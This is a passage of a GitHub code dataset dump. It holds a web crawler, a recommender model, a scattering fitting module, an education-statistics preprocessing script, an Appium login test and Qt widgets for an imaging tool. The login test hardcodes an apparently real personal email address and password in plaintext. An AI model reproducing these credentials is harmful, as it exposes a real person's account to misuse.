range(num):\n\t\tu=ulist[i]\n\t\tprint('{:^10}\\t{:^10}\\t{:^10}'.format(u[0],u[1],u[2],chr(12288)))\n\ndef main():\n\tuinfo=[]\n\turl='http://www.zuihaodaxue.cn/zuihaodaxuepaiming2018.html'\n\thtml=getHTMLText(url)\n\tfillUniList(uinfo,html)\n\tprintUniList(uinfo,10)\nmain()","repo_name":"Flintstone-xu/crawler","sub_path":"UniversityRank.py","file_name":"UniversityRank.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33532301190","text":"import tensorflow as tf\nimport tensorflow.compat.v1 as tfv1\nimport os\nimport numpy as np\nclass base_model(object):\n def __init__(self, conf, reg, learning_rate):\n self.conf = conf\n self.reg = reg\n self.learning_rate = learning_rate\n self.dim = self.conf.dimension\n self.num_users = self.conf.num_users\n self.num_items = self.conf.num_items\n self.num_negatives = self.conf.num_negatives\n self.batch_size = self.conf.training_batch_size\n\n def startConstructGraph(self):\n self.initializeNodes()\n self.constructTrainGraph()\n self.saveVariables()\n self.defineMap()\n\n def initializeNodes(self):\n tfv1.disable_eager_execution()\n self.item_input = tfv1.placeholder(\"int32\", [None])\n self.user_input = tfv1.placeholder(\"int32\", [None])\n self.item_neg_input = tfv1.placeholder(\"int32\", [None, self.num_negatives, 1])\n if self.conf.pretrain_flag:\n pre_emb = np.load(os.path.join(os.getcwd(), 'embedding', self.conf.data_name, self.conf.pre_train), encoding='latin1')\n user_embedding, item_embedding = pre_emb['user_embedding'], pre_emb['item_embedding']\n self.user_embedding = tf.Variable(\n user_embedding/np.linalg.norm(user_embedding, axis=1, keepdims=True), name='user_embedding')\n self.item_embedding = tf.Variable(\n item_embedding/np.linalg.norm(item_embedding, axis=1, keepdims=True), name='item_embedding')\n if 'dis' in self.conf.model_name:\n user_social_embedding, item_social_embedding = pre_emb['user_social_embedding'], pre_emb['item_social_embedding']\n self.user_social_embedding = tf.Variable(\n user_social_embedding/np.linalg.norm(user_social_embedding, axis=1, keepdims=True), name='user_social_embedding')\n self.item_social_embedding = tf.Variable(\n item_social_embedding/np.linalg.norm(item_social_embedding, axis=1, keepdims=True), name='item_social_embedding')\n else:\n self.user_embedding = tf.Variable(\n tf.random.normal([self.num_users, self.conf.dimension], stddev=0.01), name='user_embedding')\n self.item_embedding = tf.Variable(\n tf.random.normal([self.num_items, self.conf.dimension], stddev=0.01), name='item_embedding')\n \n def constructTrainGraph(self):\n raise NotImplementedError\n\n def saveVariables(self):\n raise NotImplementedError\n\n def predict(self, emb_u=None, emb_i=None):\n if emb_u is None:\n emb_u = self.user_embedding\n if emb_i is None:\n emb_i = self.item_embedding\n emb_u_gather = tf.gather(emb_u, self.user_input)\n return tf.matmul(emb_u_gather, tf.transpose(emb_i))\n\n def BPRloss(self, emb_u=None, emb_i=None, reg=True):\n if emb_u is None:\n emb_u = self.user_embedding\n if emb_i is None:\n emb_i = self.item_embedding\n emb_u_gather = tf.gather(emb_u, self.user_input)\n emb_i_gather = tf.gather(emb_i, self.item_input)\n emb_j_gather = tf.gather_nd(emb_i, self.item_neg_input)\n pos_score = tf.reduce_sum(emb_u_gather*emb_i_gather, -1, keepdims=True)\n neg_score = tf.reduce_sum(tf.expand_dims(emb_u_gather, 1)*emb_j_gather, -1, keepdims=False)\n loss = tf.reduce_sum(tf.reduce_mean(tf.nn.softplus(neg_score-pos_score), -1))\n if reg:\n loss += self.reg*(self.regloss([emb_u_gather, emb_i_gather])+self.regloss([emb_j_gather])/self.num_negatives)\n return loss\n\n def regloss(self, tensors):\n loss = 0\n for t in tensors:\n loss += tf.nn.l2_loss(t)\n return loss\n\n\n def defineMap(self):\n from copy import copy\n map_dict = {}\n tmp = {\n self.user_input: 'USER_LIST', \n self.item_input: 'ITEM_LIST', \n self.item_neg_input: 'ITEM_NEG_INPUT'\n }\n map_dict['train'] = tmp\n map_dict['val'] = copy(tmp)\n map_dict['test'] = copy(tmp)\n\n map_dict['eva'] = {\n self.user_input: 'EVA_USER_LIST',\n self.item_input: 'EVA_ITEM_LIST'\n }\n map_dict['out'] = {\n 'train': self.loss,\n 'val': self.loss,\n 'test': self.loss,\n 'eva': self.prediction#, self.prediction_link]\n }\n self.map_dict = map_dict\n\n\n","repo_name":"tsinghua-fib-lab/DISGCN","sub_path":"model/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":4452,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"37953474900","text":"\"\"\"Stand-alone fitting utilities\"\"\"\n\nimport numpy as np\nfrom scipy.special import gamma, psi\n\nfrom ..misc import easylsq\nfrom ..misc.errorvalue import ErrorValue\n\n__all__ = ['fit_shullroess']\n\ndef fit_shullroess(q, Intensity, Error, R0=None, r=None):\n \"\"\"Do a Shull-Roess fitting on the scattering data.\n\n Inputs:\n q: np.ndarray[ndim=1]\n vector of the q values (4*pi*sin(theta)/lambda)\n Intensity: np.ndarray[ndim=1]\n Intensity vector\n Error: np.ndarray[ndim=1]\n Error of the intensity (absolute uncertainty, 1sigma)\n R0: scalar\n first guess for the mean radius (None to autodetermine, default)\n r: np.ndarray[ndim=1]\n vector of the abscissa of the resulting size distribution (None to\n autodetermine, default)\n\n Output:\n A: ErrorValue\n the fitted value of the intensity scaling factor\n r0: the r0 parameter of the maxwellian size distribution\n n: the n parameter of the maxwellian size distribution\n r: the abscissa of the fitted size distribution\n maxw: the size distribution\n stat: the statistics dictionary, returned by nlsq_fit()\n\n Note: This first searches for r0, which best linearizes the\n log(Intensity) vs. log(q**2+3/r0**2) relation.\n After this is found, the parameters of the fitted line give the\n parameters of a Maxwellian-like particle size distribution function.\n After it a proper least squares fitting is carried out, using the\n obtained values as initial parameters.\n \"\"\"\n q = np.array(q)\n Intensity = np.array(Intensity)\n Error = np.array(Error)\n if R0 is None:\n r0s = np.linspace(1, 2 * np.pi / q.min(), 1000)\n def naive_fit_chi2(q, Intensity, r0):\n p = np.polyfit(np.log(q ** 2 + 3 / r0 ** 2), np.log(Intensity), 1)\n return ((np.polyval(p, q) - Intensity) ** 2).sum() / (len(q) - 3)\n chi2 = np.array([naive_fit_chi2(q, Intensity, r0) for r0 in r0s.tolist()])\n R0 = r0s[chi2 == chi2.min()][0]\n def naive_fit(q, Intensity, r0):\n p = np.polyfit(np.log(q ** 2 + 3 / r0 ** 2), np.log(Intensity), 1)\n return np.exp(p[1]), -2 * p[0] - 4\n K, n = naive_fit(q, Intensity, R0)\n def SR_function(q, A, r0, n):\n return A * (q ** 2 + 3 / r0 ** 2) ** (-(n + 4.) * 0.5)\n p, dp, statdict = easylsq.nlsq_fit(q, Intensity, Error, SR_function, (K, R0, n))\n n = ErrorValue(p[2], dp[2])\n r0 = ErrorValue(p[1], dp[1])\n A = ErrorValue(p[0], dp[0])\n if r is None:\n r = np.linspace(np.pi / q.max(), np.pi / q.min(), 1000)\n return A, r0, n, r, maxwellian(r, r0, n), statdict\n\ndef maxwellian(r, r0, n):\n \"\"\"Maxwellian-like distribution of spherical particles\n \n Inputs:\n -------\n r: np.ndarray or scalar\n radii\n r0: positive scalar or ErrorValue\n mean radius\n n: positive scalar or ErrorValue\n \"n\" parameter\n \n Output:\n -------\n the distribution function and its uncertainty as an ErrorValue containing arrays.\n The uncertainty of 'r0' and 'n' is taken into account.\n \n Notes:\n ------\n M(r)=2*r^n/r0^(n+1)*exp(-r^2/r0^2) / gamma((n+1)/2)\n \"\"\"\n r0 = ErrorValue(r0)\n n = ErrorValue(n)\n\n expterm = np.exp(-r ** 2 / r0.val ** 2)\n dmaxdr0 = -2 * r ** n.val * r0.val ** (-n.val - 4) * ((n.val + 1) * r0.val ** 2 - 2 * r ** 2) * expterm / gamma((n.val + 1) * 0.5)\n dmaxdn = -r ** n.val * r0.val ** (-n.val - 1) * expterm * (2 * np.log(r0.val) - 2 * np.log(r) + psi((n.val + 1) * 0.5)) / gamma((n.val + 1) * 0.5)\n\n maxwellian = 2 * r ** n.val * r0.val ** (-n.val - 1) * expterm / gamma((n.val + 1) * 0.5)\n dmaxwellian = (dmaxdn ** 2 * n.err ** 2 + dmaxdr0 ** 2 * r0.err ** 2) ** 0.5\n return ErrorValue(maxwellian, dmaxwellian)\n","repo_name":"awacha/sastool","sub_path":"sastool/fitting/standalone.py","file_name":"standalone.py","file_ext":"py","file_size_in_byte":3890,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"14834057391","text":"import pandas as pd \nimport numpy as np\nimport dash_table\nimport dash_html_components as html\nimport dash_core_components as dcc\nimport dash_bootstrap_components as dbc\nfrom dash.dependencies import Input, Output\nimport plotly.graph_objs as go\nimport os\nfrom warnings import filterwarnings\nfilterwarnings('ignore')\n\n\n\n# Download if data is not available\nfrom kaggle.api.kaggle_api_extended import KaggleApi\nif not os.path.exists(\"edstats-csv-zip-32-mb-/EdStatsData.csv\"):\n api = KaggleApi()\n api.authenticate()\n api.dataset_download_files('theworldbank/education-statistics', unzip=True)\n \n \n#read from the downloaded folder:\ndf = pd.read_csv(\"edstats-csv-zip-32-mb-/EdStatsData.csv\")\n\n#select the columns and the data:\n\nmain_cols = ['Country Code', 'Country Name', 'Indicator Code',\n 'Indicator Name'] + [str(i) for i in range(1990, 2015)]\ndf = df[main_cols]\n\n###############Grouping and ranking the data###########################\n\n# ask if there is a numeric value\nnum_cols = [col for col in df.columns if np.char.isnumeric(col)]\n\nind_count_year = df[num_cols + [\"Indicator Code\", \"Indicator Name\"]].groupby([\"Indicator Code\", \"Indicator Name\"]).count()\n\n###ranking the data###\nsorted_ind = ind_count_year.sum(axis=1).reset_index(\n name=\"count\").sort_values(['count'], ascending=False)\nsorted_ind['rank'] = sorted_ind['count'].rank(ascending=0)\nsorted_ind_top_20 = sorted_ind.head(20)\n\n##pisa indicator filter####\npd.set_option('display.max_colwidth', None)\nsorted_ind_pisa_top_10 = sorted_ind[sorted_ind[\"Indicator Code\"].str.contains(\n 'PISA')].head(10)\n\n# selection the indicators and create the new data frame:\n\n# now let's choose our 16 top indicators\nindicators = [\n # Population, total, male, female\n \"SP.POP.TOTL.MA.IN\", \"SP.POP.TOTL.FE.IN\", \"SP.POP.TOTL\",\n # Population of the official age for primary education total, male, female\n \"SP.PRM.TOTL.FE.IN\", \"SP.PRE.TOTL.MA.IN\", \"SP.PRM.TOTL.IN\",\n # PISA: Mean performance on the mathematics scale. total, male, female\n \"LO.PISA.MAT\", \"LO.PISA.MAT.FE\", \"LO.PISA.MAT.MA\",\n # PISA: Mean performance on the science scale, total, male, female\n \"LO.PISA.SCI\", \"LO.PISA.SCI.FE\", \"LO.PISA.SCI.MA\",\n # PISA: Mean performance on the reading scale, total, male, female\n \"LO.PISA.REA.MA\", \"LO.PISA.REA.FE\", \"LO.PISA.REA\",\n \"NY.GDP.PCAP.PP.KD\" # GDP per capita, PPP\n]\n\n\n# Country filtering\n\ndf_filter_ind = df[df['Indicator Code'].isin(indicators)]\n\n######### Summary table info for indicators #########################\n\n# file info:\nnum_countries_after_filter_ind = len(df_filter_ind['Country Code'].unique())\nnum_indicators_after_filter_ind = len(df_filter_ind['Indicator Code'].unique())\n\n\n##############same format of summary table################################\n# initialize list\nsummary_table_df_filter_ind = [[\"Countries\", num_countries_after_filter_ind], [\n \"Indicators\", num_indicators_after_filter_ind], [\"Years\", \"1990-2014\"]]\n# Create the pandas DataFrame\nsummary_table_df_filter_ind = pd.DataFrame(\n summary_table_df_filter_ind, columns=['Variables', 'Observations'])\n\n############## top and bottom countries filtering############################\n\nnumber_of_countries = 6\nlist_countries = [] # initialize the list of countries\n\n# function for create a list:\n\n\ndef update_list_countries(dataframe):\n for i in range(number_of_countries):\n list_countries.append(dataframe.iloc[i, 0])\n return list_countries\n\n# # top\nsearch_cols = \"LO.PISA.MAT\"\nprojection = [\"Country Name\", \"2012\"]\npisa_mat_total = df[(df[\"Indicator Code\"] == search_cols) & (df[\"2012\"].notna())]\ntop6_highestPISA_2012 = pisa_mat_total.sort_values(\"2012\", ascending=False)[\n projection].head(number_of_countries)\n\n# # update list:\nupdate_list_countries(top6_highestPISA_2012)\n\n# # bottom\nbottom6_lowestPISA_2012 = pisa_mat_total.sort_values(\"2012\")[projection].head(number_of_countries)\n# # update list country:\nupdate_list_countries(bottom6_lowestPISA_2012)\n\n\n######################\n# 1) TOP 20 overall indicators (LISTO)\n# 2) Top 10 pisa indicators (listo)\n# 3) summary table with the variables and observations\n# 3) FOURTH: Top 50 indicators\n# 4) TOP 6, BOTTOM 6,\n# 5) TOP 6 WITH HIGHEST GROWTH RATE, BOTTOM 6 WITH LOWEST GROWTH RATE\n# 6) Summary table with the variables and observations\n# \"\"\"\"\"\"\"\"\n\n\n\n\n############let's create a growth rate and filter the countries###\n\ndf['PISA.MAT_growth'] = df[[\"2012\", \"2000\"]].apply(\n lambda row: (row.iloc[0] - row.iloc[1]) / row.iloc[0] * 100, axis=1)\ndf['PISA.MAT_last_year_growth'] = df[[\"2012\", \"2009\"]].apply(\n lambda row: (row.iloc[0] - row.iloc[1]) / row.iloc[0] * 100, axis=1)\n\n# the projection data frame with variables to include\nprojection = [\"Country Name\", \"2000\", \"2012\", \"PISA.MAT_growth\"]\n\n# creating the new data frame which include the top and bottom 6 with highest and lowest growth between the years span\n\npisa_mat_total = df[(df[\"Indicator Code\"] == search_cols) & (df[\"PISA.MAT_growth\"].notna())]\n# top6:\ntop6_overall = pisa_mat_total.sort_values(\"PISA.MAT_growth\", ascending=False)[\n projection].head(number_of_countries)\nupdate_list_countries(top6_overall) # update list\n\n# bottom 6:\nbottom6_overall = pisa_mat_total.sort_values(\n \"PISA.MAT_growth\")[projection].head(number_of_countries)\n\n\nupdate_list_countries(bottom6_overall)\n\n# final list of countries:\ncountries_to_analyse = []\nfor i in list_countries:\n if i not in countries_to_analyse:\n countries_to_analyse.append(i)\n \n \nfinal_df = df_filter_ind[\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[0]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[1]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[2]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[3]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[4]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[5]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[6]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[7]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[8]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[9]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[10]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[11]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[12]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[13]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[14]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[15]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[16]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[17]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[18]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[19]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[20]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[21]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[22])\n]\n","repo_name":"ajungo2/World-Education","sub_path":"Preprocessing.py","file_name":"Preprocessing.py","file_ext":"py","file_size_in_byte":7057,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18485355834","text":"from common.myunit import startEnd\nfrom youstar_page.login_page import LoginPage\nimport unittest\nimport logging\n\n\nclass Test_loign(startEnd):\n \"\"\"youstar登录测试\"\"\"\n\n def test_login_success(self):\n \"\"\"vip登录成功\"\"\"\n logging.info(\"-----test_login_success------\")\n login = LoginPage(self.driver)\n login.vip_loin(\"chuiling950720@gmail.com\", \"9507201995\")\n login.check_process()\n self.assertTrue(login.check_search())\n\n def test_login_fail(self):\n \"\"\"vip登录失败\"\"\"\n logging.info(\"-----test_login_fail------\")\n login = LoginPage(self.driver)\n login.vip_loin(\"chuiling950720@gmail.com\", \"9507205\")\n self.assertFalse(login.check_search())\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"qangcheng/youstar_appium","sub_path":"test_case/test_youstarlogin.py","file_name":"test_youstarlogin.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21816124654","text":"from typing import List\nfrom pathlib import Path\n\nfrom qtpy.QtCore import Qt, QRegExp, QModelIndex\nfrom qtpy.QtGui import QRegExpValidator\nfrom qtpy.QtWidgets import (\n\n QAbstractItemView,\n QComboBox,\n QSpinBox,\n QSplitter,\n QTextBrowser,\n QTabWidget,\n QTableWidget,\n QListWidget,\n QListWidgetItem,\n QFormLayout,\n QLineEdit,\n QStackedLayout,\n QWidget,\n QFileDialog,\n QMessageBox,\n QTableWidgetItem,\n QHeaderView,\n QInputDialog,\n QStyledItemDelegate,\n QStyle,\n QCheckBox,\n QPushButton,\n QVBoxLayout,\n QHBoxLayout,\n QFrame,\n QLabel\n)\n\nimport vodex as vx\n\n\n# _______________________________________________________________________________\n# Collapsable implementation can be also found\n# https://stackoverflow.com/questions/52615115/how-to-create-collapsible-box-in-pyqt\n\n\ndef horizontal_line():\n line = QFrame()\n # line.setGeometry(QRect(60, 110, 751, 20))\n line.setFrameShape(QFrame.HLine)\n # line.setFrameShadow(QFrame.Sunken)\n return line\n\n\ndef clear_layout(layout, keep=0):\n # from https://stackoverflow.com/questions/4528347/clear-all-widgets-in-a-layout-in-pyqt\n while layout.count() - keep:\n child = layout.takeAt(0)\n if child.widget():\n child.widget().deleteLater()\n\n\nclass InputError(QMessageBox):\n def __init__(self, title=\"Input Error\"):\n super().__init__()\n # tutorial on message boxes: https://www.techwithtim.net/tutorials/pyqt5-tutorial/messageboxes/\n self.setWindowTitle(title)\n # self.setTextFormat(Qt.RichText)\n self.setStandardButtons(QMessageBox.Ok) # | QMessageBox.Cancel) if adding more buttons, separate with \"|\"\n self.setDefaultButton(QMessageBox.Ok) # setting default button to Cancel\n self.buttonClicked.connect(self.popup_clicked)\n\n def popup_clicked(self, i):\n return i.text()\n\n\nclass UserWarning(QMessageBox):\n def __init__(self, detailed_text):\n super().__init__()\n # tutorial on message boxes: https://www.techwithtim.net/tutorials/pyqt5-tutorial/messageboxes/\n self.setWindowTitle(\"Warning!\")\n self.setStandardButtons(QMessageBox.Ok | QMessageBox.Cancel) # if adding more buttons, separate with \"|\"\n self.setDefaultButton(QMessageBox.Cancel) # setting default button to Cancel\n self.setText(detailed_text)\n self.buttonClicked.connect(self.popup_clicked)\n\n def popup_clicked(self, i):\n return i.text()\n\n\nclass LabelCheckBox(QCheckBox):\n \"\"\"\n Saves the group information and sets the text to name.\n \"\"\"\n\n def __init__(self, group: str, name: str):\n super().__init__()\n self.label_info = (group, name)\n self.setText(name)\n\n def get_label_info(self):\n return self.label_info\n\n\nclass ReadOnlyDelegate(QStyledItemDelegate):\n \"\"\"\n Overwrites QStyledItemDelegateto turn off editing.\n \"\"\"\n\n def createEditor(self, parent: QWidget, option: 'QStyleOptionViewItem', index: QModelIndex) -> None:\n return None\n\n\nclass FileListDisplay(QWidget):\n \"\"\"\n Shows files in the folder. Allows editing.\n \"\"\"\n\n def __init__(self, file_names=[]):\n super().__init__()\n\n self.setWindowTitle(\"Files in the recording\")\n\n # Create a top-level layout\n edit_layout = QVBoxLayout()\n # prepare the list\n self.list_widget = QListWidget()\n # setting drag drop mode\n self.list_widget.setDragDropMode(QAbstractItemView.InternalMove)\n self.fill_list(file_names)\n edit_layout.addWidget(self.list_widget)\n\n # Add the buttons\n button_layout = QHBoxLayout()\n self.delete_button = QPushButton(\"Delete File\")\n self.save_button = QPushButton(\"Save File Order\")\n self.edit_button = QPushButton(\"Edit Files\")\n\n button_layout.addWidget(self.delete_button)\n button_layout.addWidget(self.save_button)\n button_layout.addWidget(self.edit_button)\n self.edit_button.hide()\n\n edit_layout.addLayout(button_layout)\n\n self.setLayout(edit_layout)\n\n def fill_list(self, file_names):\n # clear existing items\n self.list_widget.clear()\n # add file names and order to the list\n for name in file_names:\n # adding items to the list widget\n self.list_widget.addItem(QListWidgetItem(name))\n\n def delete_file(self):\n \"\"\"\n Removes a file from the list.\n \"\"\"\n curItem = self.list_widget.currentItem()\n self.list_widget.takeItem(self.list_widget.row(curItem))\n\n def freeze(self):\n \"\"\"\n Freeze the file-list widget: doesn't allow any modifications until Edit button is pressed.\n \"\"\"\n self.list_widget.setDragEnabled(False)\n self.list_widget.setEnabled(False)\n # hide the buttons\n self.delete_button.hide()\n self.save_button.hide()\n self.edit_button.show()\n\n def unfreeze(self):\n \"\"\"\n Unfreeze the file-list widget: doesn't allow any modifications until Edit button is pressed.\n \"\"\"\n self.list_widget.setDragEnabled(True)\n self.list_widget.setEnabled(True)\n # hide a button\n self.edit_button.hide()\n # show the buttons\n self.delete_button.show()\n self.save_button.show()\n\n def get_file_names(self):\n \"\"\"\n Returns the list of files in the order as they appear in the list.\n \"\"\"\n all_items = [self.list_widget.item(i).text() for i in range(self.list_widget.count())]\n return all_items\n\n\nclass LoadExperimentTab(QWidget):\n def __init__(self):\n super().__init__()\n\n # Create a top-level layout\n main_layout = QVBoxLayout()\n self.setLayout(main_layout)\n\n self.load_db_l = QLabel(\"Load Existing Experiment:\")\n self.db_location = QLineEdit()\n self.load_db_pb = QPushButton(\"Load\")\n load_layout = QHBoxLayout()\n load_layout.addWidget(self.db_location)\n load_layout.addWidget(self.load_db_pb)\n\n main_layout.addWidget(self.load_db_l)\n main_layout.addLayout(load_layout)\n\n # File Manager Info\n self.info_fm = QLabel(\"File manager information:\")\n main_layout.addWidget(self.info_fm)\n self.fm_info_string = QTextBrowser()\n main_layout.addWidget(self.fm_info_string)\n\n # Volume Manager Info\n self.info_vm = QLabel(\"Volume manager information:\")\n main_layout.addWidget(self.info_vm)\n self.vm_info_string = QTextBrowser()\n main_layout.addWidget(self.vm_info_string)\n\n def browse(self):\n start_dir = str(Path().absolute())\n\n db_location = self.db_location.text().strip()\n if Path(db_location).is_dir():\n start_dir = db_location\n if Path(db_location).is_file():\n start_dir = Path(db_location).parent\n\n selected_db, ok = QFileDialog.getOpenFileName(caption='Load Database',\n directory=start_dir, filter=\"Database Files (*.db)\")\n self.db_location.setText(selected_db)\n\n\nclass NewExperimentTab(QWidget):\n def __init__(self):\n super().__init__()\n\n self.setWindowTitle(\"Files Tab\")\n # Create a top-level layout\n main_layout = QVBoxLayout()\n self.setLayout(main_layout)\n\n # 1. get directory box and browse button\n self.dir_location = QLineEdit()\n self.browse_button = QPushButton(\"Browse\")\n self.edit_dir_button = QPushButton(\"Edit\")\n main_layout.addWidget(QLabel(\"Enter the data directory\"))\n dir_layout = QHBoxLayout()\n dir_layout.addWidget(self.dir_location)\n dir_layout.addWidget(self.browse_button)\n dir_layout.addWidget(self.edit_dir_button)\n self.edit_dir_button.hide()\n main_layout.addLayout(dir_layout)\n\n # 2. get file type combo box\n self.file_types = QComboBox()\n ftype_layout = QFormLayout()\n ftype_layout.addRow(\"Choose file type:\", self.file_types)\n # grabs the file types from vodex core.py\n self.file_types.addItems(vx.VX_SUPPORTED_TYPES.keys())\n ftype_layout.addWidget(self.file_types)\n main_layout.addLayout(ftype_layout)\n main_layout.addWidget(QLabel(\"* Currently only supports tiffiles.\\n \"\n \"Support for other types can be added in the future.\"))\n\n # 3. fetch files button\n self.files_button = QPushButton(\"Fetch files\")\n main_layout.addWidget(self.files_button)\n\n # list file names\n main_layout.addWidget(QLabel(\"Inspect the files carefully!\\nThe files appear in the order in which they will \"\n \"be read (top to bottom)!\\nYou can delete unwanted files and reorder if the \"\n \"order is not correct.\"))\n self.list_widget = FileListDisplay([])\n main_layout.addWidget(self.list_widget)\n\n def browse(self):\n start_dir = str(Path().absolute())\n if Path(self.dir_location.text().strip()).is_dir():\n start_dir = self.dir_location.text()\n\n selected_dir = QFileDialog.getExistingDirectory(caption='Choose Directory', directory=start_dir)\n self.dir_location.setText(selected_dir)\n\n def freeze_dir(self):\n \"\"\"\n Makes the field to enter the directory inactive.\n \"\"\"\n self.dir_location.setEnabled(False)\n self.browse_button.hide()\n self.edit_dir_button.show()\n self.files_button.setEnabled(False)\n\n def unfreeze_dir(self):\n self.dir_location.setEnabled(True)\n self.browse_button.show()\n self.edit_dir_button.hide()\n self.files_button.setEnabled(True)\n\n\nclass VolumeTab(QWidget):\n def __init__(self):\n super().__init__()\n\n self.setWindowTitle(\"Volumes Tab\")\n # Create a top-level layout\n main_layout = QVBoxLayout()\n self.setLayout(main_layout)\n\n # Add volumes info layout\n self.fpv = QSpinBox()\n self.fgf = QSpinBox()\n self.fpv.setRange(1, 1000000000) # if range is not set, the maximum is 100, which can be not enough,\n self.fgf.setRange(0, 1000000000) # 100000000 is well within integer range, and hopefully is enough for anyone\n self.fgf.setValue(0)\n volume_info_lo = QFormLayout()\n volume_info_lo.addRow(\"Frames per volume:\", self.fpv)\n volume_info_lo.addRow(\"First good frame:\", self.fgf)\n main_layout.addLayout(volume_info_lo)\n\n # get volumes button\n self.vm = None\n self.volumes_button = QPushButton(\"Save Volume Info\")\n main_layout.addWidget(self.volumes_button)\n # change directory button\n self.edit_vol_button = QPushButton(\"Edit Volume Info\")\n main_layout.addWidget(self.edit_vol_button)\n self.edit_vol_button.hide()\n\n # list data info\n self.info = QLabel(\"Inspect the info carefully! Is it what you expect?\")\n main_layout.addWidget(self.info)\n self.volume_info_string = QTextBrowser()\n main_layout.addWidget(self.volume_info_string)\n\n def freeze_vm(self, do_nothing=False):\n if not do_nothing:\n # create FileManager\n self.fpv.setEnabled(False)\n self.fgf.setEnabled(False)\n self.volumes_button.hide()\n self.edit_vol_button.show()\n\n def unfreeze_vm(self):\n self.fpv.setEnabled(True)\n self.fgf.setEnabled(True)\n self.volumes_button.show()\n self.edit_vol_button.hide()\n\n\nclass SaveTab(QWidget):\n\n def __init__(self):\n super().__init__()\n # 1. save FileTab and VolumeTab into a database)\n main_layout = QVBoxLayout()\n self.setLayout(main_layout)\n main_layout.addWidget(horizontal_line())\n\n self.save_pb = QPushButton(\"Save\")\n self.save_le = QLineEdit()\n self.info_label = QLabel(\"[SAVE] Save experiment to a database file:\")\n main_layout.addWidget(QLabel(\"____________________________________________________\"))\n main_layout.addWidget(self.info_label)\n main_layout.addWidget(self.save_le)\n main_layout.addWidget(self.save_pb)\n\n def get_save_filename(self):\n \"\"\"\n Returns a filename to save the database or None.\n \"\"\"\n # from here: https://pythonprogramming.net/file-saving-pyqt-tutorial/\n\n save_name = self.save_le.text()\n save_directory = Path(save_name).parent\n if save_name.endswith('.db') and save_directory.is_dir():\n file_name = save_name\n else:\n dialog = QFileDialog(self, 'Save File ( data base file format, *.db )')\n dialog.setDefaultSuffix('.db')\n if save_directory.is_dir():\n dialog.setDirectory(save_directory.as_posix())\n file_name, ok = dialog.getSaveFileName()\n if ok:\n if not file_name.endswith('.db'):\n file_name += \".db\"\n self.save_le.setText(file_name)\n else:\n file_name = None\n return file_name\n\n\nclass InitialiseTab(QWidget):\n def __init__(self):\n super().__init__()\n # 1. save FileTab and VolumeTab into a database)\n main_layout = QVBoxLayout()\n self.setLayout(main_layout)\n # next step\n self.create_experiment = QPushButton(\"Create Experiment\")\n self.edit_experiment = QPushButton(\"Edit Experiment\")\n self.next_step = QLabel(\"NEXT STEPS: You can save the experiment to disk\\n\"\n \"or load individual volumes on the [Load/Save Data] tab\\n\"\n \"or add time annotations on the [Time Annotation]\\n\")\n main_layout.addWidget(self.create_experiment)\n main_layout.addWidget(self.edit_experiment)\n main_layout.addWidget(self.next_step)\n\n self.edit_experiment.hide()\n self.next_step.hide()\n\n\nclass LabelsTab(QWidget):\n \"\"\"\n Widget to get the information about individual label: it's name and description.\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self.label_names = []\n\n self.main_lo = QVBoxLayout()\n self.setLayout(self.main_lo)\n\n # Table\n self.ROW_HEIGHT = 30 # pixels\n self.label_table = QTableWidget()\n self.set_up_table()\n self.main_lo.addWidget(self.label_table)\n\n # Add/ Delete buttons\n self.add_label = QPushButton(\"Add label\")\n self.delete_selected = QPushButton(\"Delete selected\")\n\n button_lo = QHBoxLayout()\n button_lo.addWidget(self.add_label)\n button_lo.addWidget(self.delete_selected)\n self.main_lo.addLayout(button_lo)\n\n # Error window\n self.msg = InputError()\n\n def set_up_table(self):\n self.label_table.setColumnCount(2)\n self.label_table.setColumnWidth(0, 150)\n # self.label_table.verticalHeader().hide()\n self.label_table.setHorizontalHeaderLabels([\"Label name\", \"Description (Optional)\"])\n self.label_table.setSelectionBehavior(QAbstractItemView.SelectRows)\n self.label_table.setSelectionMode(QAbstractItemView.SingleSelection)\n h_header = self.label_table.horizontalHeader()\n h_header.setSectionResizeMode(1, QHeaderView.ResizeMode.Stretch)\n\n # turn off editing for the first column\n delegate = ReadOnlyDelegate(self.label_table)\n self.label_table.setItemDelegateForColumn(0, delegate)\n\n def get_label_name(self):\n \"\"\"\n Receives a label name from the user, checks if the new label name is unique.\n If it is unique, returns the label name, if not, or if the name is empty returns none.\n \"\"\"\n label_name, ok = QInputDialog.getText(self, 'Enter label name',\n 'Try to choose meaningful names, \\n'\n 'for example: in an annotation called\"Light\" \\nthe labels could be '\n '\"on\" and \"off\" \\nto describe when the light was on 